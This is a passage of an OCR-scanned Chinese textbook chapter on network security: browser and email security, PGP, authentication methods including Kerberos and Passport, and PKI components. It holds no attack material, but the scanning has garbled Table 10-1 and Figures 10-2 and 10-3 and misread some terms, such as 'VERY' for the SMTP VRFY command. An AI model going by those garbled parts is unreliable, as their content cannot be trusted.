使 用 更 简单 的 方法 把 恶意 代码 引入 客户 机 ,以 及 更 有 可 能 获取 客户 机 环境 中 安全 敏感 的 资 
源 和 信息 。 

Web 浏览 器 安全 技术 主要 包括 以 下 4 个 方面 。 

(1) 浏览 器 实现 的 升级 。 用 户 应 该 经 常 使 用 最 新 的 补丁 升级 浏览 器 。 

(2) Java 安全 限制 。Java 在 最 初 设计 时 便 考虑 了 安全 性 。Java 1. 0 的 安全 沙 盒 模型 
(Security Sand Box Model) ,Java 1. 1 的 签名 小 应 用 程序 代码 限制 或 Java 1.2/2.0 的 细 粒 
度 访问 控制 都 可 用 于 限制 哪些 安全 敏感 资源 可 被 访问 ,以 及 如 何 被 访问 。 

(3) SSL 加 密 。SSL 可 内 置 于 许多 Web 浏览 器 中 ,从 而 使 得 在 Web 浏览 器 和 服务 器 
之 间 的 安全 传输 数据 。 

(4) SSL 服务 器 套 接 。 在 SSL 握手 阶段 ,服务 器 端的 证 书 可 被 发 送 给 Web 浏览 器 ,用 
于 认证 特定 服务 器 的 身份 。 同 时 ,客户 端的 证 书 可 被 发 送 给 Web 服务 器 ,用 于 认证 特定 用 
户 的 身份 。 


10.2 电子 邮件 安全 技术 


随 着 Internet 的 发 展 ,电子 邮件 (E-maiD) 已 经 成 为 一 项 重要 的 商用 和 家 用 资源 , 越 来 越 
多 的 商家 和 个 人 使 用 电子 邮件 作为 通信 的 手段 。 但 随 着 互联 网 的 普及 ,人 们 对 邮件 的 滥用 
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也 日 渐 增多 , 一 方面 ,试图 利用 常规 电子 邮件 系统 销售 商品 的 人 开始 利用 互联 网 发 送 
E-mail, 经 常 导致 邮件 系统 的 超 负 荷 运行 ; 另 一 方面 ,黑客 利用 电子 邮件 发 送 病毒 程序 进行 
攻击 。 随 着 Email 的 广泛 应 用 ,其 安全 性 备 受 人 们 关注 。 


10.2.1 电子 邮件 系统 的 组 成 


E-mail 系统 主要 由 邮件 分 发 代理 ,邮件 传输 代理 ,邮件 用 户 代理 及 邮件 工作 站 组 成 。 

(1) 邮件 分 发 代理 (MDA) : 负责 将 邮件 数据 库 中 的 邮件 分 发 到 用 户 的 邮箱 中 。 在 分 发 
邮件 时 ,MDA 还 将 承担 邮件 自动 过 滤 、 邮 件 自 动 回复 和 邮件 自动 触发 等 任务 。 常 见 的 
MDA 开放 源 代码 程序 有 Binmail 和 Promail 等 。 

(2) 邮件 传输 代理 (MTA): 负责 邮件 的 接收 和 发 送 ,通常 采用 SMTP 协议 传输 邮件 。 
常见 的 MTA 有 Sendmail 和 Postfix 等 。 

(3) 邮件 用 户 代理 (MUA): MUA 不 接收 邮件 ,而 是 负责 将 邮箱 中 的 邮件 显示 给 用 户 。 
MUA 常用 的 协议 有 POP3 和 IMAP, 常 见 的 程序 有 Pine、Kmail 等 。 

(4) 邮件 工作 站 : 是 邮件 用 户 直 接 操 作 的 计算 机 ,负责 显示 、 撰 写 邮 件 等 。 


10.2.2 电子 邮件 安全 目标 


根据 邮件 系统 的 组 成 ,可 以 将 邮件 安全 目标 总 结 如 下 。 

1. 邮件 分 发 安全 

邮件 分 发 时 ,可 能 遇 到 垃圾 邮件 .邮件 病毒 .开放 转发 等 威胁 ,所 以 邮件 分 发 安全 应 能 阻 
止 垃圾 邮件 和 开放 转发 ,并 查 杀 已 知 病毒 。 

2. 邮件 传输 安全 

邮件 在 传输 过 程 中 可 能 被 窃听 、 算 改 , 因 此 必须 保障 邮件 传输 的 机 密 性 和 完整 性 。 同 
时 ,邮件 在 传输 中 应 采用 SMTP 协议 ,该 协议 允许 远程 查询 邮件 账户 ,在 高 安全 要 求 的 系统 
中 保护 邮件 账户 的 状态 (如 存在 、 可 用 等 ) 也 是 安全 的 目标 。 

3. 邮件 用 户 安 全 

邮件 用 户 通 过 工作 站 ,采用 POP3 或 IMAP 等 协议 浏览 邮件 ,在 这 个 过 程 中 需要 确认 
用 户 的 身份 ,否则 将 导致 邮件 被 非 授权 访问 。 同 时 ,邮件 在 用 户 工 作 站 上 显示 时 ,可 能 需要 
在 本 地 执行 显示 软件 ,因而 容易 使 病毒 或 其 他 有 害 代 码 发 作 。 所 以 ,在 工作 站 端 也 要 能 支持 
病毒 查 杀 功 能 。 


10.2.3 电子 邮件 安全 技术 的 分 类 

针对 前 述 的 安全 目标 ,常用 的 安全 技术 如 下 。 

1. 身份 认证 技术 

身份 认证 技术 包括 邮件 转发 认证 、 邮 件 收 发 认证 等 , 即 在 要 求 转发 邮件 时 ,必须 经 过 认 
证 ,而 不 是 开放 转发 。 而 在 用 户 要 求 接收 或 发 送 邮 件 时 ,必须 经 过 身份 认证 ,以 避免 邮件 在 
邮箱 中 被 窃取 。 要 特别 强调 的 是 ,认证 的 口令 要 有 足够 安全 度 ,以 防 在 线 口令 被 破解 。 

2. 加 密 、 签 名 技术 


在 邮件 传输 过 程 中 ,必须 采用 加 密 和 签名 措施 来 保障 重要 邮件 的 机 密 性 和 完整 性 。 目 
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前 ,电子 邮件 已 渐渐 成 为 商务 信函 的 重要 形式 ,因此 ,必要 时 还 要 进行 发 送 和 接收 签名 ,以 防 
止 否认 。 在 这 方面 已 有 成 熟 的 安全 协议 PGP 和 S/MIME 等 。 

3. 协议 过 滤 技 术 

为 了 防止 邮件 账号 远程 查询 ,要 对 SMTP 的 协议 应 答 进 行 处 理 , 如 对 VERY、EXPN 等 
命令 不 予 应 答 或 无 信息 应 答 。 

4. 防火 墙 技术 

设立 内 、 外 邮件 服务 器 ,在 内 、 外 服务 器 间 设 立 防 火 墙 。 外 服务 器 负责 对 外 邮件 的 传输 
收发 ,而 内 服务 器 才 是 真正 的 用 户 邮 件 服务 器 。 所 有 来 自 公 网 上 的 邮件 操作 均 止 于 外 服务 
器 ,再 由 外 服务 器 转发 ,这 样 可 以 将 真正 的 邮箱 服务 器 与 公 网 隔离 。 

5. 邮件 病毒 过 滤 技术 

在 邮件 服务 器 上 安装 邮件 病毒 过 滤 软件 ,使 大 部 分 邮件 病毒 在 邮件 分 发 时 被 分 检 过 滤 。 
同时 在 邮件 客户 端 也 安装 防 病毒 软件 ,以 便 在 邮件 打开 前 查 杀 病毒 。 


10.2.4 电子 邮件 安全 标准 一 一 PGP 


PGP(Pretty Good Privacy) 是 一 种 对 电子 邮件 提供 加 密 、 签 名 和 认证 的 安全 服务 的 协 
议 , 已 成 为 电子 邮件 事实 上 的 安全 标准 。PGP 将 基于 公 钥 密码 体制 的 RSA 算法 和 基于 单 
密 钥 体制 的 IDEA 算法 巧妙 地 结合 起 来 ,同时 兼顾 了 公 钥 密码 体系 的 便利 性 和 传统 密码 体 
系 的 高 速度 ,形成 了 一 种 高 效 的 混合 密码 系统 。 

RFC1991 和 RFC2440 文档 描述 了 PGP 文件 格式 ,从 Internet 上 可 以 免费 下 载 PGP 加 
密 软 件 工具 包 。PGP 最 初 是 在 MS-DOS 操作 系统 上 实现 的 ,后 来 被 移植 到 UNIX、Linux 
及 Windows 等 操作 系统 上 。 

PGP 支持 对 邮件 的 数字 签名 和 签名 验证 ,还 可 以 用 来 加 密 文件 。 

1. 应 用 PGP 对 邮件 进行 数字 签名 和 认证 

对 于 每 个 邮件 ,PGP 使 用 MD5 算法 产生 的 128 位 的 散 列 值 作为 该 邮件 的 唯一 标识 ,并 
以 此 作为 邮件 签名 和 签名 验证 的 基础 。 例 如 ,为 了 证 实 邮件 是 A 发 给 B 的 ,A 首先 使 用 
MD5 算法 产生 一 个 128 位 的 散 列 值 ,再 用 A 的 私 钥 加 密 该 值 , 作 为 该 邮件 的 数字 签名 , 然 
后 把 它 附加 在 邮件 后 面 , 再 用 B 的 公 钥 加 密 整个 邮件 。 

在 这 里 ,应 当先 签名 再 加 密 ,而 不 应 先 加 密 再 签名 ,以 防止 签名 被 算 改 (攻击 者 将 原始 签 
名 去 掉 , 换 上 其 他 人 的 签名 )。B 收 到 加 密 的 邮件 后 ,首先 使 用 自己 的 私 钥 解 密 邮 件 ,得 到 A 
的 邮件 原文 和 签名 ,然后 使 用 MD5 算法 产生 一 个 128 位 的 散 列 值 ,并 和 解密 后 的 签名 相 比 
较 。 如 果 两 者 相符 合 , 则 说 明 该 邮件 确实 是 A 寄 来 的 。 

2. 应 用 PGP 对 邮件 只 签名 而 不 加 密 

发 信人 为 了 证 实 自己 的 身份 ,用 自己 的 私 钥 签 名 ; 收 件 人 用 发 信人 的 公 钥 来 验证 签名 ， 
这 不 仅 可 以 确认 发 信人 的 身份 ,并 且 还 可 以 防止 发 信人 抵赖 自己 的 声明 。 

3. 应 用 PGP 对 邮件 内 容 进 行 加 密 

PGP 应 用 IDEA 算法 对 邮件 内 容 进行 加 密 。 发 信人 首先 随机 生成 一 个 密 钥 (每 次 加 密 
都 不 同 ) ,使 用 IDEA 算法 加 密 邮 件 内 容 , 然 后 再 用 RSA 算法 加 密 该 随机 密 钥 ,并 随 邮 件 一 
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起 发 送 给 收 件 人 。 收 信人 先 用 RSA 算法 解密 出 该 随机 密 钥 ,再 用 IDEA 算法 解密 出 邮件 
内 容 。 

可 见 ,PGP 将 RSA 和 IDEA 两 种 密码 算法 有 机 地 结合 起 来 ,发 挥 各 自 的 优势 ,成 为 混 
合 密码 系统 成 功 应 用 的 典型 范例 。PGP 的 功能 实现 及 其 所 用 的 算法 如 表 10-1 所 示 。 
表 10-1 PGP 功能 实现 及 其 所 用 的 算法 


功能 所 用 算法 说 明 
使 用 SHA-1 创建 散 列 编 码 , 用 发 送 者 的 私 钥 DSS 或 
数字 签名 ”| DSS/SHA 或 RSA/SHA RSA 加 密 消 息 摘要 
注 问 各 状 CAST 或 IDEA 或 3DES、AES、| 消息 用 一 次 性 会 话 密 钥 加 密 , 会 话 密 钥 接收 方 的 公 钥 
RSA 或 Diffie- Hellman 算法 加 密 
压缩 ZIP 消息 用 ZIP 压缩 ,用 于 存储 或 传输 
邮件 应 完全 透明 ,加 密 后 的 消息 用 64 基 转 换算 法 转换 
邮件 兼容 性 | 64 基 和 转换 成 ASCII 字符 申 
数据 分 段 为 了 适应 邮件 的 大 小 限制 ,PGP 支持 分 段 和 重组 


10.3 身份 认证 技术 


在 现实 社会 中 ,人 们 常常 会 被 问 到 : 你 是 谁 ? 在 网 络 世界 里 ,这 个 问题 同样 会 出 现 , 许 
多 信息 系统 在 使 用 前 ,都 要 求 用 户 注 册 ,通过 验证 后 才能 进入 。 身 份 认证 是 防止 未 授权 用 户 
进入 信息 系统 的 第 一 道 防线 。 


10.3.1 身份 认证 的 含义 


身份 认证 包含 身份 的 识别 和 验证 。 身 份 识别 就 是 确定 某 一 实体 的 身份 ,知道 这 个 实体 
是 谁 ; 身份 验证 就 是 对 声称 是 谁 的 声称 者 的 身份 进行 证 明 ( 或 检验 ) 的 过 程 。 前 者 是 主动 识 
别 对 方 的 身份 ; 后 者 是 对 对 方 身份 的 检验 和 证 明 。 

通常 所 说 的 身份 认证 ,就 是 指 信息 系统 确认 用 户 身 份 的 过 程 。 在 数字 世界 中 ,一 切 信息 
包括 用 户 的 身份 信息 都 是 由 一 组 特定 的 数据 来 表示 的 ,计算 机 只 能 识别 用 户 的 数字 身份 ,给 
用 户 的 授权 也 是 针对 用 户 数字 身份 进行 的 。 而 我 们 生活 的 现实 世界 是 一 个 真实 的 物理 世 
界 , 每 个 人 都 拥有 独一无二 的 物理 身份 。 保 证 操作 者 的 物理 身份 与 数字 身份 相对 应 ,就 是 身 
份 认证 管理 系统 所 需要 解决 的 问题 。 

目前 ,验证 用 户 身 份 的 方法 主要 有 以 下 3 种 情况 。 

(1) 所 知道 的 某 种 信息 ,如 口令 、 账 号 和 身份 证 号 等 。 

(2) 所 拥有 的 物品 ,如 图 章 、 标 志 、 钥 匙 ,护照 ,IC 卡 和 USB Key 等 。 

(3) 所 具有 的 独一无二 的 个 人 特征 ,如 指纹 、 声 纹 、 手 形 、 视 网 膜 和 基因 等 。 


10.3.2 身份 认证 的 方法 


1. 基于 用 户 已 知 信息 的 身份 认证 
(1) 口令 。 口 令 ( 或 通行 字 ) 是 被 广泛 研究 和 应 用 的 一 种 身份 验证 方法 ,也 是 最 简单 的 
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身份 认证 方法 。 用 户 的 口令 由 用 户 自 己 设 定 , 只 有 用 户 自 己 才 知道 。 只 要 能 够 正确 输入 口 
令 , 计 算 机 就 认为 操作 者 就 是 合法 用 户 。 

口令 的 优点 :“ 用 户 名 十 口令 ”的 方式 已 经 成 为 信息 系统 最 为 常见 的 限制 非法 用 户 的 手 
段 ,使 用 非常 方便 。 只 要 管理 适当 ,口令 不 失 为 一 种 有 效 的 安全 保障 手段 。 

口令 的 缺点 : 信息 系统 的 安全 依赖 于 口令 的 安全 ,但 是 使 用 口令 存在 许多 安全 隐患 ,如 
弱 口 令 ( 如 某 人 的 生日 .电话 号 码 和 电子 邮件 等 ,容易 被 人 猜 中 或 攻击 ) ,不 安全 存储 (如 记录 
在 纸 质 上 或 存放 在 计算 机 里 ) 和 易 受 到 攻击 (口令 很 难 抵抗 字典 攻击 ,静态 口令 很 容易 被 驻 
留 在 计算 机 内 存 中 的 木马 程序 或 网 络 中 的 监听 设备 截获 ) 。 

此 外 ,许多 信息 系统 对 “用 户 名 十 口令 ”的 身份 认证 方式 进行 了 改进 ,采用 “用 户 名 十 口 
令 十 验证 码 ” 的 方式 ,验证 码 要 求 用户 从 图 片 或 其 他 载体 中 读 取 ,有 效 地 避免 了 暴力 攻击 。 

(2) 密 钥 。 此 处 密 钥 的 概念 是 基于 密码 学 意义 而 言 的 , 即 指 对 称 密码 算法 的 密 钥 、 非 对 
称 密码 算法 的 公开 密 钥 和 私有 密 钥 。“ 用 户 名 十 口令 ”方式 是 基于 判断 用 户 是 否 知道 口令 ， 
一 般 不 涉及 复杂 的 计算 ,只 需 进行 比较 就 可 以 了 ; 而 密 钥 的 使 用 是 基于 复杂 的 加 密 运 算 。 
下 面 分 两 种 情况 分 别 进行 说 明 。 

J@ 若 通信 双方 采用 对 称 密码 算法 进行 保密 通信 ,在 通信 前 ,双方 约定 共享 密 钥 K ,接收 
方 收 到 密 文 后 ,如 果 能 够 使 用 共享 密 钥 K 解密 ,那么 他 就 相信 发 送 方 的 身份 了 ,因为 只 有 发 
送 方 才 知 道 这 个 密 钥 。 

@ 若 通信 双方 采用 非 对 称 密码 算法 进行 保密 通信 和 数字 签名 ,在 通信 前 ,发 送 方 通过 
公共 数据 库 查 询 接收 方 的 公 钥 ,他 首先 采用 接收 方 的 公 钥 进行 加 密 , 然 后 用 自己 的 私 钥 进行 
数字 签名 ,这 样 接收 方 先 用 发 送 方 的 公 钥 验证 签名 是 否 正 确 ,如 果 正 确 ,那么 他 相信 发 送 方 
的 身份 ,因为 只 有 发 送 方才 可 能 签名 ,同时 ,再 用 自己 的 私 钥 解密 ,获得 明文 。 

密 钥 的 优点 : 基于 复杂 的 密码 运算 ,算法 的 安全 性 大 为 提高 。 

密 钥 的 缺点 : 运算 复杂 ,效率 不 高 ,使 用 不 方便 。 使 用 对 称 密 钥 算法 时 ,认证 对 方 身份 
的 前 提 是 他 必须 保守 共享 密 钥 这 个 秘密 ,这 本 身 就 是 脆弱 的 。 

2. 基于 用 户 所 拥有 的 物品 的 身份 认证 

(1) 记忆 卡 。 最 普通 的 记忆 卡 是 磁卡 ,磁卡 的 表面 贴 有 磁 条 , 磁 条 上 记录 用 于 机 器 识别 
的 个 人 信息 ,记忆 卡 也 称 为 令 牌 。 

记忆 卡 的 优点 : 记忆 卡 明 显 比 口令 安全 ,廉价 而 易于 生产 。 黑 客 或 其 他 假冒 者 必须 同 
时 拥有 记忆 卡 和 PIN, 这 当然 比 单纯 获取 口令 更 加 困难 。 

记忆 卡 的 缺点 : 易于 制造 , 磁 条 上 的 数据 也 不 难 转录 。 

(2) 智能 卡 。 智 能 卡 是 一 种 内 置 集成 电路 的 芯片 ,包含 微 处 理 器 .存储 器 和 输入 /输出 
接口 设备 等 。 它 存储 的 信息 远 远 大 于 磁 条 的 250B 的 容量 ,具有 信息 处 理 功能 。 智 能 卡 由 
合法 用 户 随 身 携 带 ,登录 时 将 智能 卡 插入 专用 的 读 卡 器 读 取 其 中 的 信息 ,以 验证 用 户 的 身 
份 。 智 能 卡 内 存 有 用 户 的 密 钥 和 数字 证 书 等 信息 ,而 且 还 能 进行 有 关 加 密 和 数字 签名 运算 ， 
功能 比较 强大 。 这 些 运 算 都 在 卡 内 完成 ,不 使 用 计算 机 内 存 ,因而 十 分 安全 。 智 能 卡 结合 了 
先进 的 集成 电路 芯片 ,具有 运算 快速 、 存 储量 大 、 安 全 性 高 及 难以 破译 等 优点 ,是 未 来 卡片 的 
发 展 趋势 。 

(3) USB Key。USB Key 是 一 种 USB 接口 的 硬件 存储 设备 , 它 内 置 单片机 或 芯片 ,可 
以 存储 用 户 的 密 钥 或 数字 证 书 。 利 用 USB Key 内 置 的 密码 算法 可 实现 对 用 户 身份 的 认 
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证 。 基 于 USB Key 身份 认证 系统 主要 有 两 种 应 用 模式 : 一 是 基于 冲击 /响应 的 认证 模 
式 ; 二 是 基于 PKI 体 系 的 认证 模式 。 它 的 原理 类 似 智能 卡 ,区 别 在 于 外 形 功能 和 使 用 方 
式 方面 。 

3. 基于 用 户 生 物 特征 的 身份 认证 

传统 的 身份 认证 技术 ,不 论 是 基于 所 知 信息 的 身份 认证 ,还 是 基于 所 拥有 物品 的 身份 认 
证 ,甚至 是 二 者 相 结 合 的 身份 认证 ,始终 没有 结合 人 的 特征 ,都 不 同 程 度 地 存在 不 足 。 以 “用 
户 名 十 口令 ”方式 过 渡 到 智能 卡 方式 为 例 ,首先 需要 随时 携带 智能 卡 ,智能 卡 容易 丢失 ; 然 
后 需要 记 住 PIN ,PIN 也 容易 丢失 和 忘记 ;最 后 当 PIN 或 智能 卡 丢失 时 ,补办 手续 烦琐 元 
长 ,并 且 需 要 出 示 能 够 证 明 身 份 的 证 件 , 使 用 很 不 方便 。 直 到 生物 识别 技术 得 到 成 功 的 应 
用 ,身份 认证 问题 才 迎 为 而 解 。 这 种 紧密 结合 人 的 特征 的 方法 ,意义 不 只 在 技术 上 的 进步 ， 
而 是 站 在 人 文 角 度 ,真正 回归 到 了 人 本 身 最 原始 的 生理 特征 。 

生物 识别 技术 主要 是 指 通 过 可 测量 的 身体 或 行为 等 生物 特征 进行 身份 认证 的 一 种 技 
术 。 生 物 特征 是 指 唯 一 可 以 测量 或 可 自动 识别 和 验证 的 生理 特征 或 行为 方式 。 生 物 特征 分 
为 身体 特征 和 行为 特征 两 类 。 身 体 特征 包括 指纹 、 掌 型 视网膜、 虹膜 、 人 体 气味 、 脸 型 . 手 的 
血管 和 DNA 等 ; 行为 特征 包括 签名 .语音 、 行 走 步 态 等 。 目 前 部 分 学 者 将 视网膜 识别 .虹膜 
识别 和 指纹 识别 等 归 为 高 级 生物 识别 技术 ;将 掌 型 识别 .脸型 识别 .语音 识别 和 签名 识别 等 
归 为 次 级 生物 识别 技术 ;将 血管 纹理 识别 、 人 体 气味 识别 .DNA 识别 等 归 为 “深奥 的 ?生物 识 
别 技术 。 

与 传统 身份 认证 技术 相 比 ,生物 识别 技术 具有 以 下 特点 。 

(1) 随身 性 : 生物 特征 是 人 体 固有 的 特征 ,与 人 体 是 唯一 绑 定 的 ,具有 随身 性 。 

(2) 安全 性 : 人 体 特征 本 身 就 是 个 人 身份 的 最 好 证 明 , 可 满足 更 高 的 安全 需求 。 

(3) 唯一 性 : 每 个 人 拥有 的 生物 特征 各 不 相同 。 

(4) 稳定 性 : 指纹 、 虹 膜 等 人 体 特征 不 会 随时 间 等 条 件 的 变化 而 变化 。 

(5) 方便 性 : 生物 识别 技术 不 需 记忆 密码 与 携带 使 用 特殊 工具 (如 钥匙 ) ,不 会 遗失 。 

(6) 可 接受 性 : 使 用 者 对 所 选择 的 个 人 生物 特征 及 其 应 用 愿意 接受 。 

4. 身份 认证 的 典型 例子 

目前 ,国外 已 经 有 许多 协议 和 产品 支持 身份 认证 ,其 中 比较 典型 的 有 一 次 一 密 机 制 、 
Kerberos 协议 、Liberty 协议 .Passport 系统 和 公 钥 认证 体系 。 

(1) 一 次 一 密 机 制 。 一 次 一 密 机 制 主要 有 两 种 实现 方式 : 第 一 种 是 采用 请 求 /应 答 
(challenge/response) 方 式 , 用 户 登录 时 系统 随机 提示 一 条 信息 ,用 户 根 据 这 一 信息 连同 其 
个 人 化 数据 共同 产生 一 个 口令 字 , 用 户 输入 这 个 口令 字 , 完 成 一 次 登录 过 程 ,或 者 用 户 对 这 
一 条 信息 实施 数字 签名 发 送 给 AS 进行 鉴别 ; 第 二 种 是 采用 时 钟 同步 机 制 , 即 根据 这 个 同 
步 时 钟 信息 连同 其 个 人 化 数据 共同 产生 一 个 口令 字 。 这 两 种 方案 均 需 要 AS 端 也 产生 与 用 
户 端 相同 的 口令 字 ( 或 检验 用 户 签名 ) 用 于 验证 用 户 身份 。 

(2) Kerberos 协议 。Kerberos 协议 是 为 基于 TCP/IP 的 Internet 和 Intranet 设计 的 安 
全 认证 协议 , 它 工 作 在 Client/Server 模式 下 ,以 可 信赖 的 第 三 方 KDC( 密 钥 分 配 中 心 ) 实 现 
用 户 身 份 认证 。 在 认证 过 程 中 ,Kerberos 使 用 对 称 密 钥 加 密 算 法 ,提供 了 计算 机 网 络 中 通 
信 双 方 之 间 的 身份 认证 。Kerberos 设计 的 目的 是 解决 在 分 布 网 络 环境 中 用 户 访问 网 络 资 
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源 时 的 安全 问题 。 

由 于 Kerberos 是 基于 对 称 加 密 来 实现 认证 的 ,这 就 涉及 加 密 密 钥 对 的 产生 和 管理 问 
题 。 在 Kerberos 中 会 对 每 一 个 用 户 分 配 一 个 密 钥 对 ,如 果 网 络 中 存在 N 个 用 户 , 则 
Kerberos 系统 会 保存 和 维护 N 个 密 钥 对 。 同 时 ,在 Kerberos 系统 中 只 要 求 使 用 对 称 密码 ， 
而 没有 对 具体 算法 和 标准 做 限定 ,这 样 便于 Kerberos 协议 的 推广 和 应 用 。Kerberos 已 广 
泛 应 用 于 Internet 和 Intranet 服务 的 安全 访问 ,具有 高 度 的 安全 性 可靠 性 .透明 性 和 可 伸 
缩 性 等 优点 。 目 前 广泛 使 用 的 Kerberos 的 版 本 是 第 4 版 (v4) 和 第 5 版 (v5) ,其 中 Kerberos 
v5 弥补 了 v4 中 存在 的 一 些 安全 漏洞 。 

一 个 完整 的 Kerberos 系统 主要 由 用 户 端 (Client)、 服 务 器 端 (Server)、 密 钥 分 配 中 心 
(Key Distribution Center, KDC) 、 认 证 服务 器 (Authentication Server, AS) 票据 分 配 服 务 
器 (Ticket Granting Server,TGS) .票据 和 时 间 截 组 成 。 

Kerberos 的 基本 认证 过 程 如 图 10-2 所 示 。 

密 钥 分 配 中 心 (KDC) 


认证 服务 器 险 证 
| (AS) -3 
@ 一 


一 二 | =| 票据 分 配 服 务 器 
(TGS) 


资源 服务 器 
图 10-2 ”Kerberos 的 基本 认证 过 程 


(3) Liberty 协议 。Liberty 协议 是 基于 安全 声明 标记 语言 (Security Assertions 
Markup Language,SAML) 标 准 的 一 个 面向 Web 应 用 身份 认证 的 与 平台 无 关 的 开放 协议 。 
它 的 核心 思想 是 身份 联合 (Identity Federation) ,两 个 Web 应 用 之 间 可 以 保留 原来 的 用 户 
认证 机 制 ,通过 建立 它们 各 自身 份 的 对 应 关系 来 达到 身份 认证 的 目的 ;用 户 的 验证 票据 通过 
HTTP、Redirection 或 Cookie 在 Web 应 用 间 传 递 来 实现 身份 认证 ,而 用 户 的 个 人 信息 的 交 
换 通 过 两 个 Web 应 用 间 的 后 台 SOAP 通信 进行 。 

(4) Passport 系统 。Passport 是 微软 推出 的 基于 Web 的 统一 身份 认证 系统 , 它 由 一 个 
Passport 服务 器 和 若干 联盟 站 点 组 成 。 用 户 通过 网 页 在 Passport 服务 器 处 使 用 “用 户 名 十 
口令 ”来 认证 自己 的 身份 ,Passport 服务 器 则 在 用 户 本 地 浏览 器 的 Cookie 中 写 入 一 个 认证 
票据 ,并 根据 用 户 所 要 访问 的 站 点 生成 一 个 站 点 相关 的 票据 ,然后 将 该 票据 封装 在 HTTP 
请 求 消息 里 ,把 用 户 重 定向 到 目标 站 点 。 目 标 站 点 的 安全 基础 设施 将 根据 收 到 的 票据 来 认 
证 用 户 的 身份 。 通 过 使 用 Cookie 和 重 定向 机 制 , Passport 实现 了 基于 Web 的 身份 认证 
服务 。 
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(5) 公 钥 认证 体系 。 公 钥 认证 的 原理 是 用 户 向 认证 机 构 提 供用 户 所 拥有 的 数字 证 书 来 
实现 用 户 的 身份 认证 。 数 字 证 书 是 由 可 信赖 的 第 三 方 一 一 认证 中 心 (CA) 颁 发 的 ,含有 用 户 
的 特征 信息 的 数据 文件 ,并 包含 认证 中 心 的 数字 签名 。 因 此 ,数字 证 书 不 能 被 伪造 和 自 改 ， 
这 是 靠 认 证 中 心 的 数字 签名 来 确保 的 ,除非 认证 中 心 的 私 钥 泄密 ,这 样 就 可 以 通过 对 数字 证 
书 的 验证 来 确认 用 户 的 身份 。 


10.4 公 钥 基础 设施 技术 


PKI(Public Key Infrastructure) 是 公 钥 基础 设施 的 简称 ,是 一 种 遵循 标准 的 ,利用 公 钥 
密码 技术 为 网 上 电子 商务 、 电 子 政务 等 各 种 应 用 提供 安全 服务 的 基础 平台 。 它 能 够 为 网 络 
应 用 透明 地 提供 密 钥 和 证 书 管理 .加密 和 数字 签名 等 服务 ,是 目前 网 络 安全 建设 的 基础 与 核 
心 。 用 户 利 用 PKI 平 台 提供 的 安全 服务 进行 安全 通信 。 


10.4.1 PKI 技 术 概 述 


PKI 采 用 数字 证 书 进行 公 钥 管理 ,通过 第 三 方 的 可 信任 机 构 ( 认 证 中 心 , 即 CA) 把 用 户 
的 公 钥 和 用 户 的 标识 信息 捆绑 在 一 起 ,包括 用 户 名 和 电子 邮件 地 址 等 信息 ,目的 在 于 为 用 户 
提供 网 络 身 份 验证 服务 。 

因此 ,所 有 提供 公 钥 加 密 和 数字 签名 服务 的 系统 都 可 归结 为 PKI 系统 的 一 部 分 , PKI 
的 主要 目的 是 通过 自动 管理 密 钥 和 证 书 , 为 用 户 建立 起 一 个 安全 的 网 络 运 行 环境 ,使 用 户 可 
以 在 多 种 应 用 环境 下 应 用 PKI 提供 的 服务 ,从 而 实现 网 上 传输 数据 的 机 密 性 、 完 整 性 、 真 实 
性 和 有 效 性 要 求 。 

PKI 发 展 的 一 个 重要 方面 就 是 标准 化 问题 , 它 也 是 建立 互 操作 性 的 基础 。 目 前 ,PKI 标 
准 化 主要 有 两 个 方面 :一 是 RSA 公司 的 公 钥 加 密 标准 (Public Key Cryptography 
Standards,PKCS) , 它 定义 了 许多 基本 PKI 部 件 ,包括 数字 签名 和 证 书 请 求 格式 等 ;二 是 由 
Internet 工程 任务 组 (Internet Engineering Task Force,IETF) 和 PKI 工作 组 (Public Key 
Infrastructure Working Group) 所 定义 的 一 组 具有 互 操作 性 的 公 钥 基础 设施 协议 (Public 
Key Infrastructure Using X. 509,PKIX) , 即 支 持 X. 509 的 公 钥 基础 的 架构 和 协议 。 

在 今后 很 长 的 一 段 时 间 内 ,PKCS 和 PKIX 将 会 并 存 , 大 部 分 的 PKI 产品 为 保持 兼容 
性 ,也 将 会 对 这 两 种 标准 进行 支持 。 

PKI 的 发 展 非常 快 ,已 经 从 几 年 前 的 理论 阶段 过 渡 到 目前 的 产品 阶段 ,并 且 出 现 了 大 量 
的 成 熟 技 术 、 产 品 和 解决 方案 , 正 逐 步 走 向 成 熟 。 目 前 ,PKI 产品 的 生产 厂家 很 多 ,有 代表 性 
的 主要 有 VeriSign 和 Entrust。VeriSign 作为 RSA 的 控股 公司 ,借助 RSA 成 熟 的 安全 技 
术 提 供 了 PKI 产品 ,为 用 户 之 间 的 内 部 信息 交互 提供 安全 保障 。 

另外 ,VeriSign 也 提供 对 外 的 CA 服务 ,包括 证 书 的 发 布 和 管理 等 功能 ,并 且 同 一 些 大 
的 生产 商 ( 如 Microsoft、Netscape 和 JavaSoft 等 ) 保 持 了 伙伴 关系 ,已 在 Internet 上 提供 代 
码 签名 服务 。Entrust 作为 北方 电信 (Northern Telecom) 的 控股 公司 ,从 事 PKI 的 研究 与 
产品 开发 已 经 有 很 多 年 的 历史 了 , 且 一 直 在 业界 保持 领先 地 位 ,拥有 许多 成 熟 的 PKI 及 配 
套 产品 ,并 提供 了 有 效 的 密 钥 管理 功能 。 男 外 ,一 些 大 的 厂商 (如 Microsoft、Netscape 和 
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Novell 等 ) 都 开始 在 自己 的 网 络 基础 设施 产品 中 增加 了 PKI 功能 。 
10.4.2 PKI 的 组 成 


PKI 系统 由 认证 中 心 (Certificate Authority, CA) .证 书库 、 密 钥 备 份 及 恢复 系统 、 证 
作废 处 理 系 统 和 应 用 接口 等 部 分 组 成 ,如 图 10-3 所 示 。 


es 


PKI 


| 


I 
WE 证 书 席 ”| |[ 窜 角 备份 及 | [ 证 书 作 庆 
(CA) | Ei | 恢复 系统 | | 处 理 系统 | | 应 用 接口 


图 10-3 PKI 系统 的 组 成 


1. 认证 中 心 (CA) 

CA 是 PKI 的 核心 ,也 是 数字 证 书 的 签发 机 构 。 构 建 PKI 平 台 的 核心 内 容 是 如 何 实现 
密 钥 管理 。 公 钥 密 码 体制 包括 公 钥 和 私 钥 ,其 中 私 钥 由 用 户 秘密 保管 ,无 须 在 网 上 传送 , 公 
钥 则 是 公开 的 ,可 以 在 网 上 传送 。 因 此 , 密 钥 管理 实质 上 是 指 公 钥 的 管理 ,目前 较 好 的 解决 
方案 是 引入 数字 证 书 (certificate) 。 

CA 的 功能 有 证 书 发 放 、 证 书 更 新 .证 书 撤销 和 证 书 验证 。CA 的 核心 功能 就 是 发 放 和 
